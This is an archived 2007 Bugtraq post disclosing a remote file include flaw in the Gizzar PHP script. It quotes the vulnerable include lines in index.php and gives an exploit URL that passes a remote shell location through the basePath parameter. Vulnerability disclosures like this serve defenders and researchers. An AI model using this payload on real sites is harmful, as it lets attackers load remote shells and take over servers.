Bugtraq mailing list archives

Gizzar <= (basePath) Remote File Include Vulnerability


From: "BorN To K!LL BorN To K!LL" <q.t.i () hotmail com>
Date: Mon, 16 Apr 2007 22:33:43 +0300

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Gizzar <= (basePath) Remote File Include Vulnerability

Download: http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz

Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:

index.php

code:

include_once($basePath."include/config.php");
include_once($basePath."include/access.php");

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

EploiT:

wWw.SiTe.cOm/[path]/index.php?basePath=Shell

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Greedz 2:

Dr.2  -  AsbMay  -  GolD_M  -  str0ke ....

wWw.KuW-SeC.cC
wWw.Asb-May.nEt

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


Current thread: